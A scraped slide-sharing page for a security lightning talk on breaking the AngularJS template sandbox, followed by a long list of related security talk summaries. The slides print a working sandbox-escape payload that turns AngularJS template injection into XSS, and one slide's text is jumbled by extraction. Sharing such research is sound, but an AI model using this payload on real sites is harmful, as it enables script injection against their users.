Breaking AngularJS Javascript sandbox
2 likes2,180 views
The document is a lightning talk by Avlidienbrunn on AngularJS, highlighting its use as a JavaScript framework for single-page applications. It discusses template expressions and their sandboxing capabilities to prevent security risks, such as XSS attacks, by restricting access to certain JavaScript functionalities. The talk also briefly touches on evasion techniques related to JavaScript execution in AngularJS environments.
1 of 6
Downloaded 19 times
![What is AngularJS? And
where’s the sandbox?
• Javascript framework for building single page web
applications.
• Mustache style templates: Having <h1>{{1+2+3}}</h1>
anywhere in Angular HTML app will render <h1>6</h1>
• Template expressions are evaluated with Javascript
• Template expression Javascript is sandboxed - It can’t
reach [object Window] or DOM
• If we could access dangerous objects from templates, we
could XSS any AngularJS app that prints user data in
Angular bound HTML](https://image.slidesharecdn.com/angularjs-140919054944-phpapp01/85/Breaking-AngularJS-Javascript-sandbox-2-320.jpg)
![The bypass
toString.constructor.prototype.toString=
toString.constructor.prototype.call;
[“a”,"alert(1)"].sort(toString.constructor)
alert(1)](https://image.slidesharecdn.com/angularjs-140919054944-phpapp01/85/Breaking-AngularJS-Javascript-sandbox-4-320.jpg)
![The how
if(if((toString.Function("compareFunction(function(constructor.a){a", alert("alert(1)}) 1)}).element1, 1)") prototype.== toString() == 1){
1){
element2) toString=
== 1..toString()){
== 1){
toString.//{{sort toString.element constructor.constructor.as bigger
prototype.prototype.call;
toString=
}else if((function(["if(… a","toString.alert(== a){0){
1)"].alert(constructor.sort(1)}).Function);
call() prototype.== 1..toString()){
call;
//sort element as same
}else{
//sort element as smaller
}
//sort element as bigger
}else if(… == 0){
//sort element as same
}else{
//sort element as smaller
}
toString.constructor);
[“a”,”alert(1)”].sort(toString.constructor)}}
alert(1)](https://image.slidesharecdn.com/angularjs-140919054944-phpapp01/85/Breaking-AngularJS-Javascript-sandbox-5-320.jpg)
Ad
Recommended
ng-owasp: OWASP Top 10 for AngularJS Applications
ng-owasp: OWASP Top 10 for AngularJS ApplicationsKevin Hakanson The document discusses the OWASP Top 10 security risks for AngularJS applications, emphasizing critical vulnerabilities such as injection flaws, broken authentication, and cross-site scripting (XSS). It highlights the importance of built-in AngularJS features that enhance security, such as ngSanitize and strict contextual escaping ($sce). Additionally, best practices for developers regarding configuration, data protection, and user input handling are outlined to mitigate these security risks.
Locking the Throneroom 2.0
Locking the Throneroom 2.0Mario Heiderich This document summarizes Mario Heiderich's presentation titled "Locking the Throne Room - How ES5+ will change XSS and Client Side Security" given at BlueHat, Redmond 2011. The presentation discusses how new features in ECMAScript 5 (ES5), such as Object.defineProperty(), can be used to prevent cross-site scripting (XSS) attacks by locking down access to sensitive DOM properties and methods on the client-side in a tamper-resistant way. This moves XSS mitigation closer to the client where the attacks occur, avoiding issues caused by impedance mismatches between server-side filters and client-side execution. The approach could allow role-based access control and intrusion
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownMario Heiderich This document summarizes a talk given by Gareth Heyes and Mario Heiderich on web security and the PHPIDS project. It describes the early challenges of detecting attacks using simple blacklists and how the project evolved to address increasingly complex obfuscated payloads. Key points discussed include the introduction of a payload canonicalizer to normalize strings before detection, ongoing challenges of new browser behaviors and standards, and the importance of an open community approach to security research.
In the DOM, no one will hear you scream
In the DOM, no one will hear you screamMario Heiderich The document discusses the history and development of the Document Object Model (DOM) from its early implementations in 1995 to modern standards. It outlines key milestones like DOM Level 1 in 1998, the rise of JavaScript frameworks like Prototype, jQuery and MooTools in 2005-2006, and ongoing work by the W3C and WHATWG. The talk will explore security issues that can arise from the DOM's ability to convert strings to executable code and demonstrate an attack technique called DOM clobbering.
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSMario Heiderich The document discusses security issues with AngularJS and summarizes four general attack vectors:
A1: Attacking the AngularJS sandbox by bypassing restrictions on dangerous objects and methods. Early versions had trivial bypasses but later versions required more creative techniques.
A2: Attacking the AngularJS sanitizer, which aims to sanitize HTML strings and remove XSS attacks. There were issues with both an older sanitizer version and the current version.
A3: Attacking the Content Security Policy (CSP) mode in AngularJS.
A4: Attacking vulnerabilities directly in the AngularJS codebase through techniques like sandbox bypasses.
A XSSmas carol
A XSSmas carolcgvwzq The document discusses a security challenge focused on exploiting XSS (Cross-Site Scripting) vulnerabilities across several PHP files (index.php, token.php, index2.php, index3.php). It details the author's approach, strategies, and outcomes while attempting to bypass anti-XSS measures and generate successful payloads for the challenge. Additionally, it includes snippets of code and ideas for effective exploitation techniques, emphasizing trial and error in the learning process.
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillMario Heiderich - The document discusses scriptless attacks that can bypass traditional XSS defenses like NoScript and XSS filters by leveraging new HTML5 and CSS features.
- It presents several proof-of-concept attacks including using CSS to steal passwords, using SVG fonts to brute force CSRF tokens, and using custom fonts to leak sensitive information like passwords without using JavaScript.
- The attacks demonstrate that even without scripting, features in HTML5 and CSS can be abused to conduct traditional XSS attacks and undermine security defenses, so more work is needed to protect against side-channels and unwanted data leakage from the browser.
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Mario Heiderich The document discusses a case study on clipboard vulnerabilities and the potential for cross-application XSS (Cross-Site Scripting) attacks through copy and paste functionalities. It details how attackers can manipulate clipboard data from various applications like LibreOffice and Office to inject harmful HTML and JavaScript into web browsers, exploiting weaknesses in clipboard sanitization. The speaker emphasizes the need for improved security measures in browsers, particularly in sanitizing clipboard inputs, and concludes with a cautionary note on the risks associated with copy-pasting data.
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityMario Heiderich The talk by Johannes Hofmann and Mario Heiderich addresses the vulnerabilities and security challenges faced by developers in IT security, highlighting the misguided perceptions that lead to insecure coding practices. They outline offensive techniques that attackers could use against developers and emphasize the necessity of stronger security measures and awareness among developers. The presentation concludes with actionable advice for enhancing security, such as adopting a least privilege policy and employing best practices in software management.
HTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyMario Heiderich This document provides an overview of HTML5 including its history, current status, implementation in browsers, and both benefits and security issues. It discusses how HTML5 aims to simplify and enhance usability but also introduces new vulnerabilities due to its dynamic nature forcing rapid implementation. While HTML5 enables rich content and interactivity, its inconsistencies and evolving specifications combined with a rush for browser support has resulted in buggy websites and potential for attacks like hijacking forms, stealing data, and bypassing security restrictions.
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010Mario Heiderich This document discusses current and emerging web attacks. It notes that while cross-site scripting (XSS) and SQL injection attacks were once prevalent, modern web applications and browsers incorporate defenses against these attacks. However, the document argues that web applications and browsers are evolving in ways that enable new types of multi-layer attacks. Examples are provided of attacks that combine layers like the database management system, JavaScript execution in browsers, and HTML parsing quirks to bypass defenses. The document urges security researchers and practitioners to consider these evolving attack techniques and the growing diversity of client devices and applications.
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson The presentation by Mathias Karlsson discusses the concept of polyglot payloads, which are payloads that can function in multiple contexts while remaining valid. It highlights the importance of these payloads in identifying vulnerabilities that traditional testing may miss and explores various types including MySQL injection and XSS. Additionally, practical applications and examples are provided, illustrating how polyglot payloads can be combined to bypass security measures.
The Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesMario Heiderich Mario Heiderich gave a presentation on active content injection using SVG files. He discussed how SVG files are XML-based and support scripting, allowing execution of JavaScript. This enables security issues like XSS. Browser implementations of SVG are inconsistent, with different levels of script support depending on how SVG files are deployed (inline, via <img>, etc). Exploits discussed SVG vulnerabilities in Firefox, Opera, and Chromium. Defense is difficult due to lack of documentation and filters, and new vectors are found weekly. Future work proposed a SVG purifier and raising awareness of issues.
New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationKen Belva The document presents a comprehensive overview of new methods for automated XSS detection and dynamic exploit creation, highlighted through multiple slide decks at the OWASP AppSec USA 2015 conference. Kenneth F. Belva, the developer of XSSwarrior, outlines an innovative approach that moves beyond traditional payload methods to focus on tracking data input and output while building cases for identifying vulnerabilities. It emphasizes the importance of character parsing, dynamic testing, and the development of a functional scanning application to address current limitations in XSS detection technologies.
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Mario Heiderich This document discusses using ES5 capabilities to help mitigate cross-site scripting (XSS) vulnerabilities. It summarizes the history of JavaScript and XSS, current approaches to mitigation, and limitations. It then proposes using ES5 features like Object.defineProperty to prohibit unauthorized access to DOM properties and add monitoring of property access. This could enable intrusion detection and role-based access control without impedance mismatches. Examples show freezing DOM objects to prevent tampering. Limitations include blacklisting and compatibility issues, but the approach aims to detect and prevent XSS at the client level without server-side filtering.
Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Mario Heiderich Mario Heiderich presents on generic attack detection using PHPIDS. PHPIDS uses 70 regex rules to detect attacks like XSS and SQLi by analyzing user input. It first normalizes the input, then detects patterns through a conversion and detection process, and can log or report any findings. PHPIDS aims to avoid blacklisting traps through this generic approach. Future work may include optimizing existing detection routines and adding more granular analysis techniques.
Building Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute) The document discusses advanced XSS (Cross-Site Scripting) techniques presented by a security researcher. It covers various methods for building XSS vectors, including agnostic event handlers, reusing native code, filter bypassing, and location-based payloads. The presenter emphasizes the complexity of XSS attacks and the ease of evading security filters.
Dom based xss
Dom based xssLê Giáp This document discusses DOM based cross-site scripting (XSS) and methods for detecting it. It begins by explaining what DOM and XSS are, and defines DOM based XSS as exploiting client-side script execution by modifying the DOM environment. Next, it provides examples of how DOM based XSS can work by manipulating DOM objects like document.location. The document concludes by outlining approaches for detecting DOM based XSS including general analysis, using the headless browser PhantomJS to programmatically interact with web pages, and leveraging a modified version of PhantomJS called Tainted PhantomJS that is designed specifically for DOM based XSS detection.
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupMario Heiderich The document is a transcript from a talk given by Mario Heiderich at the CONFidence 2009 conference. It discusses various ways that malicious code can be embedded in markup and exploited by browsers, including through techniques like inline SVG, XML namespaces, XUL artifacts, and more. It provides examples of actual malicious code and encourages awareness of legacy browser vulnerabilities as new web standards are developed.
XSS - Attacks & Defense
XSS - Attacks & DefenseBlueinfy Solutions This document discusses cross-site scripting (XSS) attacks and defenses. It describes different types of XSS (persistent, non-persistent, DOM-based), how XSS attacks work, and examples of XSS injection vectors. It also provides recommendations for preventing XSS, including encoding output, sanitizing input, and using features like HttpOnly cookies.
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsSimon Willison The document is a presentation about web application security fundamentals and attacks. It discusses topics like cross-site scripting (XSS), cross-site request forgery (CSRF), UTF-7 encoding, and other techniques like JSON parsing (JSONP). In the past, security tutorials focused on not trusting user input, avoiding SQL injection, and preventing JavaScript injection, but the presenter aims to discuss more modern attacks.
So you thought you were safe using AngularJS.. Think again!
So you thought you were safe using AngularJS.. Think again!Lewis Ardern The document is a presentation on AngularJS security given by Lewis Ardern. It includes:
- An introduction and biography of the presenter
- An agenda covering AngularJS security protections, issues, third-party libraries, and the future
- A quiz on AngularJS fundamentals
- Explanations of AngularJS security protections like output encoding, SCE, and CSRF protection
- Discussions of potential security issues like template loading, expression injection, and sandbox escapes
- Recommendations for securely implementing AngularJS templates and expressions
The innerHTML Apocalypse
The innerHTML ApocalypseMario Heiderich The presentation by Mario Heiderich discusses how MXSS (Mutating XSS) attacks challenge existing beliefs about web security, particularly focusing on the manipulation of the DOM through innerHTML. It highlights the complexities of detecting and preventing various forms of XSS, emphasizing that filters and sanitizers often fail to address fundamental vulnerabilities. Heiderich concludes with strategies for developers and pentesters to mitigate these issues, advocating for stricter standards and a deeper understanding of browser behavior.
Securing your AngularJS Application
Securing your AngularJS ApplicationPhilippe De Ryck The document discusses web security challenges, specifically focusing on securing AngularJS applications against threats like cross-site request forgery (CSRF) and cross-site scripting (XSS). It outlines various attack vectors, their implications, and potential countermeasures such as the use of HTML tokens, origin headers, and content security policies. Additionally, it addresses the importance of secure coding practices and understanding how JavaScript MVC frameworks influence the security landscape.
JSON SQL Injection and the Lessons Learned
JSON SQL Injection and the Lessons LearnedKazuho Oku This document discusses JSON SQL injection and lessons learned from vulnerabilities in SQL query builders. It describes how user-supplied JSON input containing operators instead of scalar values could manipulate queries by injecting conditions like id!='-1' instead of a specific id value. This allows accessing unintended data. The document examines how SQL::QueryMaker and a strict mode in SQL::Maker address this by restricting query parameters to special operator objects or raising errors on non-scalar values. While helpful, strict mode may break existing code, requiring changes to parameter handling. The vulnerability also applies to other languages' frameworks that similarly convert arrays to SQL IN clauses.
Reviewing AngularJS
Reviewing AngularJSLewis Ardern The document provides an overview of AngularJS, a popular open-source web application framework maintained by Google, detailing its features, security concerns, and best practices. It highlights potential security vulnerabilities such as sandbox escapes, CSP bypasses, and client-side routing issues, emphasizing the importance of server-side validation and proper use of AngularJS features like Strict Contextual Escaping (SCE). Additionally, it suggests tools for assessing AngularJS applications and cautions against mixing client-side and server-side templates to prevent XSS attacks.
Preventing In-Browser Malicious Code Execution
Preventing In-Browser Malicious Code ExecutionStefano Di Paola The document is a financial cyber-threat briefing focusing on strategies for developing attack-resilient web applications, presented by Stefano Di Paola, a CTO and security expert. It discusses the OWASP Top Ten web application security risks, particularly emphasizing cross-site scripting (XSS) vulnerabilities, and outlines methodologies for identification and defense against such threats. The presentation introduces the DominatorPro tool for automated security assessment of client-side applications, highlighting the necessity of addressing third-party JavaScript security vulnerabilities.
OWASP London - So you thought you were safe using AngularJS.. Think again!
OWASP London - So you thought you were safe using AngularJS.. Think again!Lewis Ardern The document discusses AngularJS security, highlighting its benefits, common vulnerabilities, and various security measures. It covers the importance of proper configuration to avoid issues like XSS and CSRF, as well as the risks of third-party libraries. Furthermore, it touches on the evolution of Angular versions and their security improvements.
SQL Injection INSERT ON DUPLICATE KEY trick
SQL Injection INSERT ON DUPLICATE KEY trickMathias Karlsson The document discusses a security issue involving a login system where an SQL injection vulnerability allows the attacker to change the admin's password to the same as that of a regular user. It references a lightning talk by Mathias Karlsson, highlighting that SQL injection during insertion can be more severe than during selection. Overall, it emphasizes the importance of securing applications against such vulnerabilities.
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén The document discusses the experiences and techniques of Frans Rosén, a prominent bug bounty hunter, detailing his approach to targeting vulnerabilities and automating the discovery process. It includes references to specific cases, tools used, and notable achievements in the bug bounty community. Additionally, it highlights various security issues encountered during testing, emphasizing the importance of continual learning and adaptation in the field of cybersecurity.
More Related Content
What's hot (20)
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityMario Heiderich The talk by Johannes Hofmann and Mario Heiderich addresses the vulnerabilities and security challenges faced by developers in IT security, highlighting the misguided perceptions that lead to insecure coding practices. They outline offensive techniques that attackers could use against developers and emphasize the necessity of stronger security measures and awareness among developers. The presentation concludes with actionable advice for enhancing security, such as adopting a least privilege policy and employing best practices in software management.
HTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyMario Heiderich This document provides an overview of HTML5 including its history, current status, implementation in browsers, and both benefits and security issues. It discusses how HTML5 aims to simplify and enhance usability but also introduces new vulnerabilities due to its dynamic nature forcing rapid implementation. While HTML5 enables rich content and interactivity, its inconsistencies and evolving specifications combined with a rush for browser support has resulted in buggy websites and potential for attacks like hijacking forms, stealing data, and bypassing security restrictions.
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010Mario Heiderich This document discusses current and emerging web attacks. It notes that while cross-site scripting (XSS) and SQL injection attacks were once prevalent, modern web applications and browsers incorporate defenses against these attacks. However, the document argues that web applications and browsers are evolving in ways that enable new types of multi-layer attacks. Examples are provided of attacks that combine layers like the database management system, JavaScript execution in browsers, and HTML parsing quirks to bypass defenses. The document urges security researchers and practitioners to consider these evolving attack techniques and the growing diversity of client devices and applications.
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson The presentation by Mathias Karlsson discusses the concept of polyglot payloads, which are payloads that can function in multiple contexts while remaining valid. It highlights the importance of these payloads in identifying vulnerabilities that traditional testing may miss and explores various types including MySQL injection and XSS. Additionally, practical applications and examples are provided, illustrating how polyglot payloads can be combined to bypass security measures.
The Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesMario Heiderich Mario Heiderich gave a presentation on active content injection using SVG files. He discussed how SVG files are XML-based and support scripting, allowing execution of JavaScript. This enables security issues like XSS. Browser implementations of SVG are inconsistent, with different levels of script support depending on how SVG files are deployed (inline, via <img>, etc). Exploits discussed SVG vulnerabilities in Firefox, Opera, and Chromium. Defense is difficult due to lack of documentation and filters, and new vectors are found weekly. Future work proposed a SVG purifier and raising awareness of issues.
New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationKen Belva The document presents a comprehensive overview of new methods for automated XSS detection and dynamic exploit creation, highlighted through multiple slide decks at the OWASP AppSec USA 2015 conference. Kenneth F. Belva, the developer of XSSwarrior, outlines an innovative approach that moves beyond traditional payload methods to focus on tracking data input and output while building cases for identifying vulnerabilities. It emphasizes the importance of character parsing, dynamic testing, and the development of a functional scanning application to address current limitations in XSS detection technologies.
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Mario Heiderich This document discusses using ES5 capabilities to help mitigate cross-site scripting (XSS) vulnerabilities. It summarizes the history of JavaScript and XSS, current approaches to mitigation, and limitations. It then proposes using ES5 features like Object.defineProperty to prohibit unauthorized access to DOM properties and add monitoring of property access. This could enable intrusion detection and role-based access control without impedance mismatches. Examples show freezing DOM objects to prevent tampering. Limitations include blacklisting and compatibility issues, but the approach aims to detect and prevent XSS at the client level without server-side filtering.
Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Mario Heiderich Mario Heiderich presents on generic attack detection using PHPIDS. PHPIDS uses 70 regex rules to detect attacks like XSS and SQLi by analyzing user input. It first normalizes the input, then detects patterns through a conversion and detection process, and can log or report any findings. PHPIDS aims to avoid blacklisting traps through this generic approach. Future work may include optimizing existing detection routines and adding more granular analysis techniques.
Building Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute) The document discusses advanced XSS (Cross-Site Scripting) techniques presented by a security researcher. It covers various methods for building XSS vectors, including agnostic event handlers, reusing native code, filter bypassing, and location-based payloads. The presenter emphasizes the complexity of XSS attacks and the ease of evading security filters.
Dom based xss
Dom based xssLê Giáp This document discusses DOM based cross-site scripting (XSS) and methods for detecting it. It begins by explaining what DOM and XSS are, and defines DOM based XSS as exploiting client-side script execution by modifying the DOM environment. Next, it provides examples of how DOM based XSS can work by manipulating DOM objects like document.location. The document concludes by outlining approaches for detecting DOM based XSS including general analysis, using the headless browser PhantomJS to programmatically interact with web pages, and leveraging a modified version of PhantomJS called Tainted PhantomJS that is designed specifically for DOM based XSS detection.
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupMario Heiderich The document is a transcript from a talk given by Mario Heiderich at the CONFidence 2009 conference. It discusses various ways that malicious code can be embedded in markup and exploited by browsers, including through techniques like inline SVG, XML namespaces, XUL artifacts, and more. It provides examples of actual malicious code and encourages awareness of legacy browser vulnerabilities as new web standards are developed.
XSS - Attacks & Defense
XSS - Attacks & DefenseBlueinfy Solutions This document discusses cross-site scripting (XSS) attacks and defenses. It describes different types of XSS (persistent, non-persistent, DOM-based), how XSS attacks work, and examples of XSS injection vectors. It also provides recommendations for preventing XSS, including encoding output, sanitizing input, and using features like HttpOnly cookies.
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsSimon Willison The document is a presentation about web application security fundamentals and attacks. It discusses topics like cross-site scripting (XSS), cross-site request forgery (CSRF), UTF-7 encoding, and other techniques like JSON parsing (JSONP). In the past, security tutorials focused on not trusting user input, avoiding SQL injection, and preventing JavaScript injection, but the presenter aims to discuss more modern attacks.
So you thought you were safe using AngularJS.. Think again!
So you thought you were safe using AngularJS.. Think again!Lewis Ardern The document is a presentation on AngularJS security given by Lewis Ardern. It includes:
- An introduction and biography of the presenter
- An agenda covering AngularJS security protections, issues, third-party libraries, and the future
- A quiz on AngularJS fundamentals
- Explanations of AngularJS security protections like output encoding, SCE, and CSRF protection
- Discussions of potential security issues like template loading, expression injection, and sandbox escapes
- Recommendations for securely implementing AngularJS templates and expressions
The innerHTML Apocalypse
The innerHTML ApocalypseMario Heiderich The presentation by Mario Heiderich discusses how MXSS (Mutating XSS) attacks challenge existing beliefs about web security, particularly focusing on the manipulation of the DOM through innerHTML. It highlights the complexities of detecting and preventing various forms of XSS, emphasizing that filters and sanitizers often fail to address fundamental vulnerabilities. Heiderich concludes with strategies for developers and pentesters to mitigate these issues, advocating for stricter standards and a deeper understanding of browser behavior.
Securing your AngularJS Application
Securing your AngularJS ApplicationPhilippe De Ryck The document discusses web security challenges, specifically focusing on securing AngularJS applications against threats like cross-site request forgery (CSRF) and cross-site scripting (XSS). It outlines various attack vectors, their implications, and potential countermeasures such as the use of HTML tokens, origin headers, and content security policies. Additionally, it addresses the importance of secure coding practices and understanding how JavaScript MVC frameworks influence the security landscape.
JSON SQL Injection and the Lessons Learned
JSON SQL Injection and the Lessons LearnedKazuho Oku This document discusses JSON SQL injection and lessons learned from vulnerabilities in SQL query builders. It describes how user-supplied JSON input containing operators instead of scalar values could manipulate queries by injecting conditions like id!='-1' instead of a specific id value. This allows accessing unintended data. The document examines how SQL::QueryMaker and a strict mode in SQL::Maker address this by restricting query parameters to special operator objects or raising errors on non-scalar values. While helpful, strict mode may break existing code, requiring changes to parameter handling. The vulnerability also applies to other languages' frameworks that similarly convert arrays to SQL IN clauses.
Reviewing AngularJS
Reviewing AngularJSLewis Ardern The document provides an overview of AngularJS, a popular open-source web application framework maintained by Google, detailing its features, security concerns, and best practices. It highlights potential security vulnerabilities such as sandbox escapes, CSP bypasses, and client-side routing issues, emphasizing the importance of server-side validation and proper use of AngularJS features like Strict Contextual Escaping (SCE). Additionally, it suggests tools for assessing AngularJS applications and cautions against mixing client-side and server-side templates to prevent XSS attacks.
Preventing In-Browser Malicious Code Execution
Preventing In-Browser Malicious Code ExecutionStefano Di Paola The document is a financial cyber-threat briefing focusing on strategies for developing attack-resilient web applications, presented by Stefano Di Paola, a CTO and security expert. It discusses the OWASP Top Ten web application security risks, particularly emphasizing cross-site scripting (XSS) vulnerabilities, and outlines methodologies for identification and defense against such threats. The presentation introduces the DominatorPro tool for automated security assessment of client-side applications, highlighting the necessity of addressing third-party JavaScript security vulnerabilities.
OWASP London - So you thought you were safe using AngularJS.. Think again!
OWASP London - So you thought you were safe using AngularJS.. Think again!Lewis Ardern The document discusses AngularJS security, highlighting its benefits, common vulnerabilities, and various security measures. It covers the importance of proper configuration to avoid issues like XSS and CSRF, as well as the risks of third-party libraries. Furthermore, it touches on the evolution of Angular versions and their security improvements.
Viewers also liked (19)
SQL Injection INSERT ON DUPLICATE KEY trick
SQL Injection INSERT ON DUPLICATE KEY trickMathias Karlsson The document discusses a security issue involving a login system where an SQL injection vulnerability allows the attacker to change the admin's password to the same as that of a regular user. It references a lightning talk by Mathias Karlsson, highlighting that SQL injection during insertion can be more severe than during selection. Overall, it emphasizes the importance of securing applications against such vulnerabilities.
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén The document discusses the experiences and techniques of Frans Rosén, a prominent bug bounty hunter, detailing his approach to targeting vulnerabilities and automating the discovery process. It includes references to specific cases, tools used, and notable achievements in the bug bounty community. Additionally, it highlights various security issues encountered during testing, emphasizing the importance of continual learning and adaptation in the field of cybersecurity.
Crossing Origins by Crossing Formats
Crossing Origins by Crossing Formatsinternot This document discusses cross-origin attacks using polyglot files that can be interpreted in multiple formats. Specifically, it examines:
1) Syntax injection attacks where fragments of PDF syntax are injected into HTML pages hosted on vulnerable sites, allowing extraction of sensitive data from the original domain.
2) Content smuggling attacks where an attacker uploads a polyglot file in a benign format (e.g. PDF) that also contains malicious content to a vulnerable site, then embeds it to exploit visitors through content reinterpretation.
3) The potential for these attacks using PDF, which has powerful interactive capabilities, error-tolerant parsing, and ability to issue cross-origin requests like CSRF with cookies
Bug Bounty - Hackers Job
Bug Bounty - Hackers JobArbin Godar This document discusses bug bounty programs, which pay security researchers monetary rewards for reporting qualifying security bugs to companies. It explains that bug bounties are a cost-effective way for companies to improve security. The document provides tips for getting started in bug hunting, such as practicing skills, reading materials, and thinking logically. Popular bug bounty programs and platforms are also listed.
Hackfest presentation.pptx
Hackfest presentation.pptxPeter Yaworski The document provides an overview of bug bounties, including the author's personal journey and accomplishments in the field. It emphasizes the challenges of hacking, the importance of reputation, and strategic approaches to successful bug bounty hunting. Additionally, it offers advice on tools and creating effective bug reports for better relationships with bounty programs.
If You Can't Beat 'Em, Join 'Em (AppSecUSA)
If You Can't Beat 'Em, Join 'Em (AppSecUSA)bugcrowd The document discusses practical tips for implementing a successful bug bounty program, highlighting its historical context and the diverse range of security researchers involved. Key elements include defining scope, managing expectations pre- and post-launch, and fostering effective communication with researchers. The authors emphasize the importance of a structured approach to vulnerability rating and the value of crowdsourced testing in enhancing security.
Writing vuln reports that maximize payouts - Nullcon 2016
Writing vuln reports that maximize payouts - Nullcon 2016bugcrowd The document outlines guidelines for submitting vulnerabilities in a crowdsourced cybersecurity context to maximize payouts. Key steps include understanding the bounty brief, clearly communicating the impact of vulnerabilities using the STRIDE model, and providing proof of concept for validation. It emphasizes avoiding scenarios that lack clarity, depend on other vulnerabilities, or are not true vulnerabilities to ensure successful submissions.
The Game of Bug Bounty Hunting - Money, Drama, Action and Fame
The Game of Bug Bounty Hunting - Money, Drama, Action and FameAbhinav Mishra The document provides an overview of the game of bug bounty hunting, including a brief history of bug bounty programs, the present state of platforms like HackerOne and BugCrowd, tips for getting started, techniques for finding different types of vulnerabilities, examples of famous bounty submissions, and potential drama one may face. It also includes suggestions for resources, tools, blogs, and people to follow to continue learning and developing skills in bug bounty hunting.
Bug Bounty - Play For Money
Bug Bounty - Play For MoneyShubham Gupta This document provides an overview of bug bounty hunting. It discusses:
- What bug bounty programs are and how they work
- A brief history of major bug bounty programs from the 1990s to present day
- Reasons to participate in bug bounty hunting like money, career opportunities, and enjoyment
- Popular bug bounty platforms and programs
- How to get started with the process of bug hunting
- Tips for writing bug reports that document the issue and steps to reproduce it
- Examples of past bug bounty finds, like an SVG XSS filter bypass and a tapjacking proof of concept
Bug Bounty Secrets
Bug Bounty Secrets n|u - The Open Security Community Bug bounty programs involve paying security researchers rewards for finding vulnerabilities in companies' products. To participate, researchers need to understand the target company's products and domains, know which companies offer bounties, and find bugs that are in scope like XSS, SQL injection, or authentication bypasses. Rewards can range from $100 to $20,000. Major companies like Google, Facebook, and Mozilla run bounty programs and have collectively paid over $1 million to researchers. Examples are shown of real bugs found and reported through bounty programs. The conclusion encourages reporting bugs to companies rather than selling vulnerabilities.
Bug Bounty for - Beginners
Bug Bounty for - BeginnersHimanshu Kumar Das The document provides an introduction to bug bounty programs for beginners. It outlines some prerequisites like patience and basic security knowledge. It highlights rewards available in bug bounty programs like money and gifts. The document recommends initial approaches like understanding the testing scope and performing reconnaissance on domains and subdomains. It also provides tips on tools for testing like web proxies and Firefox addons. Automated testing on a local web server is discussed along with techniques for bug submission and reporting. A demo of a stored XSS bug in Facebook is presented at the end.
Bug Bounty 101
Bug Bounty 101Shahee Mirza This document provides an introduction to bug bounty programs. It defines what a bug bounty program is, provides a brief history of major programs, and discusses reasons they are beneficial for both security researchers and companies. Key points covered include popular programs like Google and Facebook, tools used in bug hunting like Burp Suite, and lessons for researchers such as writing quality reports and following each program's rules.
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd The document outlines a bug hunting methodology presented by Faraz Khan and based on Jason Haddix's original work. It covers strategies and tools used in discovering vulnerabilities through web and mobile bug hunting, including techniques for parsing, mapping, and exploiting various vulnerabilities. Key topics include the differences between standard penetration testing and bounty hunting, discovery techniques, and specific vulnerabilities such as XSS, SQL injection, and CSRF.
Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesKarwin Software Solutions LLC The document discusses various myths and misconceptions surrounding SQL injection vulnerabilities, emphasizing that such issues remain relevant and can lead to significant security breaches, as seen in real-world cases. It details common fallacies, such as the belief that escaping input alone prevents SQL injection, and highlights that effective defenses require comprehensive strategies that combine various methodologies. Ultimately, it warns against relying too heavily on any single solution, advocating for a thorough understanding of SQL security practices.
Synack cirtical infrasructure webinar
Synack cirtical infrasructure webinarSynack The document discusses critical infrastructure security vulnerabilities revealed in a survey presented during a webinar. It highlights that a significant percentage of organizations lack dedicated security resources for their control systems, resulting in increased risks for attackers. The paper suggests that technology solutions and policy changes are necessary to improve security and mitigate potential threats to critical infrastructure.
[DefCon 2016] I got 99 Problems, but
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but
Little Snitch ain’t one!Synack The document discusses security vulnerabilities related to the Little Snitch firewall on macOS, highlighting methods to bypass its protections using various techniques and exploits. It details specific components and functionalities of Little Snitch, as well as potential weaknesses in its kernel extension. The analysis includes code snippets and reverse engineering insights, emphasizing the implications for security in 21st-century technology.
Zeronights 2016 - Automating iOS blackbox security scanning
